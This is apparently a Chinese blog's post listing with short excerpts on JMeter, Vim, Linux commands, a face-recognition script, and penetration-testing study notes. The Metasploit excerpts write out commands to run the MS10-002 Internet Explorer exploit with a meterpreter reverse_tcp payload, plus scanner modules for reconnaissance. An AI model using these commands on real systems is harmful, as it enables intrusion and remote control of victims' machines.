- 博客(9)
- 资源 (1)
- 收藏
- 关注
原创 Jmeter 测试带有防XSRF的网站
XSRF也称是CSRF(跨站域请求伪造),是一种网络的攻击方式。在对某个网站测试时,使用fiddler进行抓包,查看登录获取的cookie数据。将cookie信息写入到jmeter的cookie管理器中去。再编写登录后要进行的业务操作。然后执行jmeter脚本。查看结果树,发现登录成功了,但是进行业务操作失败了。查看响应信息,响应说是XSRF-TOKEN无效。难道是正则表达式写错了?,但是在添加Debug PostProcessor查看变量之后,XSRF-TOKEN是有信
2020-09-07 17:45:44 429
原创 Jmeter测试最大在线用户数
首先我们编写一个登录某个网站的脚本。运行脚本我们会发现,脚本只是成功的进行了登录这个操作,但并没有一直在线。所以我们进一步使用Fiddler进行抓包查看。可以看出,网站每个一段时间就会向服务器发送一个请求,这样我们就能明白为什么浏览器登录后,系统会一直保持在线的状态。我们的脚本中没有编写定期和服务器进行通信,所以当执行登录后,这个线程也会关闭。...
2020-07-29 09:01:12 6143
原创 渗透测试学习--metasploit使用实例
IE漏洞利用实例MS10-002 IE漏洞利用search ms10_002 搜索漏洞利用模块use windows/browser/ms10_002_auroraset payload windows/meterpreter/reverse_tcp 设置载核show options 显示选项set SRVHOST IP 设置ip set SBVPORT 80 设置访问端口(默认8080)set URIPATH / 设置根路径set LHOST IP 本地监听地址set L
2020-06-16 17:05:45 343
原创 渗透测试学习笔记 ----metasploit
渗透测试学习笔记 ----matesploit常用命名扫描主机 msf:use auxiliary/scanner/portscan/syn查找mssql(sql server)主机:msf:use auxiliary/scanner/mssql/mssql_pingssh服务器扫描:msf:use auxiliary/scanner/ssh/ssh_versiontelnet扫描:msf:use auxiliary/scanner/telnet/telnet_versionftp扫描:msf:
2020-06-16 09:18:24 251
原创 Vim常用快捷键
vim 定位命令:set nu 设置行号:set nonu 取消行号gg 到第一行G 到最后一行nG 到第n行:n 到第n行$ 移至行尾0 移至行首Vim 删除命令x 删除光标所在处字符nx 删除光标所在处后n个字符dd 删除光标所在行,ndd删除n行dG 删除光标到所在行到文件末尾内容D 删除...
2020-03-15 23:17:52 100
原创 linux小工具及其部分快捷键
grep [选项] ‘关键字’ 文件名OPTIONS: -i 不区分大小写 -v 反向查找 -w 按单词查找 -o 打印匹配关键词 -c 统计匹配到的次数 -n 显示行号 -r 逐层遍历目录查找 -l 只列出匹配的文件名...
2019-11-22 15:29:59 119
原创 基于python+opencv的简易人脸识别打卡系统
直接上源码import cv2import osimport numpy as npfrom PIL import Imageimport datetimeimport csv# 调用笔记本内置摄像头,所以参数为0,如果有其他的摄像头可以调整参数为1,2Path = r"C:\Program Files (x86)\Microsoft Visual Studio\Shared\...
2019-04-06 09:23:42 7819 13
原创 Linux常用指令
ls [选项] [文件或目录]选项: -a 显示所有文件,包括隐藏文件。-l 显示详细信息 (ll缩写)-d 查看目录属性-h 人性化显示文件大小-i 显示I node(i节点)-rw-r--r--- 文件类型(- 文件 d目录 I 软链接文件)rw-(u所有者) r--(g所属组)r—(o其他人)r读 w写 x执行建立目录(mkdir)mkdir -...
2019-04-04 10:19:53 94
原创 linux搜索命令
文件搜索Locate [文件](新建的文件无法搜索)Locate是在后台数据库中按文件名搜索,搜索速度更快(/var/lib/mlocate 后台数据库一天一更新)强制更新数据库:updatedb搜索限制:#开启搜索限制:PRUNE_BIND_MOUNTS=”yes”#搜索时,不搜索的文件系统:PRUNEFS=#搜索时,不搜索的文件类型:PRUNENAMES=#搜索时,不搜索的路径:PRUNEPA...
2018-05-16 11:35:15 1191
py描述器文档
2018-06-26
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人